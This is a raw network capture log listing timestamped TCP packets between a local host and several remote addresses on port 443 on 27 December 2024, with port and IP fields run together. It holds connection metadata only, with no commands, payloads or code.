                                                        Dec 27, 2024 08:47:53.070949078 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.073551893 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.073631048 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.076486111 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.076589108 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.165662050 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.165846109 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.169255972 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.169405937 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.172090054 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.172364950 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.174959898 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.175144911 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.178559065 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.178946972 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.181370020 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.181548119 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.184294939 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.184395075 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.187128067 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.187238932 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.190745115 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.190965891 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.193538904 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.193622112 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.252449989 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.252610922 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.255372047 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.255489111 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.258177996 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.258268118 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.262995958 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.263115883 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.265597105 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.265670061 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.267504930 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.267582893 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.314095020 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.314233065 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.357224941 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.357337952 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.360313892 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.360399008 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.363054991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.363112926 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.365964890 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.366020918 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.368776083 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.368843079 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.372431040 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.372509956 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.375359058 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.375436068 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.378113031 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.378182888 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.381834984 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.381917953 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.384562016 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.384641886 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.443921089 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.444014072 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.446125984 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.446182013 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.449054956 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.449131966 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.451858044 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.451926947 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.169625998 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.253842115 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.253907919 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.256383896 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.256724119 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.258217096 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.258310080 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.261405945 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.261523962 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.264667034 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.264796019 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.266747952 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.266901016 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.328690052 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.329253912 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.331469059 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.331645966 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.333761930 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.333872080 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.337821960 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.337955952 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.339849949 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.340049028 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.342453957 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.342691898 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.344770908 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.344840050 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.347942114 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.348061085 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.358215094 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.358297110 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.360714912 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.360865116 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.444108009 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.444199085 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.446492910 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.446594000 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.449115992 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.449225903 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.452444077 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.452562094 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.454854965 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.454916954 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.457676888 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.457819939 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.519712925 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.519841909 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.523056984 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.523298025 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.525237083 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.525381088 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.528012037 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.528331995 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.530684948 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.530757904 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.533998966 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.534063101 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.536178112 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.536309004 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.538791895 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.538912058 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.549097061 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.549251080 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.551670074 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.551949024 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.635691881 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.635839939 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.638106108 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.638247013 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.640845060 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.641005039 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.644001007 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.644198895 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.646519899 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.646672964 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.649174929 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.649279118 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.711494923 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.711570024 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.713637114 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.713865995 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.716344118 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.716510057 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.718858004 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.719333887 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.722035885 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.722160101 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.724706888 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.724904060 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.727438927 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.728396893 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.730449915 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.730556965 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.740684032 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.740782976 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.742631912 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.742691994 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.749269962 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.749381065 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.829397917 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.829579115 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.831868887 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.832015038 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.834346056 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.834490061 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.837594032 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.837784052 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.840099096 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.840245962 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.843414068 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.844119072 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.904263973 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.904356956 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.907516003 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.907849073 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.909919977 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.909976006 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.912580967 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.912637949 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.915090084 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.916677952 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.918277025 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.918385029 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.920804024 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.920855999 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.923420906 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.923674107 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.933989048 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.934195042 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:55.936822891 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:55.936991930 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.020456076 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.020524979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.022958994 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.023024082 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.025515079 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.025612116 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.028079033 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.028811932 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.031301022 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.031363010 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.033793926 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.033854961 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.097748041 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.097908020 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.099694014 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.099833965 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.103058100 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.103249073 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.105509043 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.105590105 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.108179092 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.108268023 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.111414909 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.111532927 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.113890886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.113970041 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.116503954 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.116580963 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.125284910 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.125360012 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.127727985 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.127813101 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.211491108 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.211606979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.214215040 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.214422941 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.216839075 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.217000008 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.219373941 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.219460011 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.222604990 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.222676992 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.225153923 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.225224972 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.287364960 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.287508965 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.289340019 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.289414883 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.292607069 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.292771101 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.295095921 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.295192957 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.297708035 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.297806978 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.300245047 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.300321102 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.303458929 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.303567886 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.306109905 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.306201935 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.316787958 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.316950083 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.318887949 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.318949938 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.321497917 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.321608067 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.405499935 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.405556917 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.407932043 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.408004045 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.410552979 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.410820961 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.413047075 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.413119078 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.416378021 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.416517019 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.418895006 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.418952942 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.480590105 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.480669022 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.483768940 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.483932972 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.486323118 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.486404896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.488890886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.489031076 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.491408110 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.491758108 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.494640112 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.494695902 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.497148991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.497209072 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.499777079 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.221841097 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.221841097 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.221853018 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.222445011 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.224030018 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.224107027 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.226572037 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.226753950 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.229871035 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.230006933 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.232331991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.232990026 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.238643885 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.238817930 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.240310907 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.240392923 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.240418911 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.240756035 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.241080046 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:48:12.663614035 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.663662910 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.663845062 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790318012 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790347099 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.790402889 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.790796041 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790821075 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:13.821682930 CET49807443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:48:13.821726084 CET44349807206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:48:13.821826935 CET49807443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:48:13.938548088 CET49807443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:48:13.938570976 CET44349807206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:48:13.938663960 CET44349807206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:48:13.938678980 CET49807443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:48:13.938694954 CET44349807206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:48:14.961674929 CET49808443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:48:14.961724043 CET4434980894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:48:14.961796045 CET49808443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:48:15.055658102 CET49808443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:48:15.055695057 CET4434980894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:48:15.055752039 CET4434980894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:48:16.088567019 CET49814443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:16.088622093 CET44349814188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:16.088778973 CET49814443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:16.163089037 CET49814443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:16.163109064 CET44349814188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:16.163165092 CET44349814188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:16.163177967 CET49814443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:16.163197041 CET44349814188.132.183.159192.168.2.10
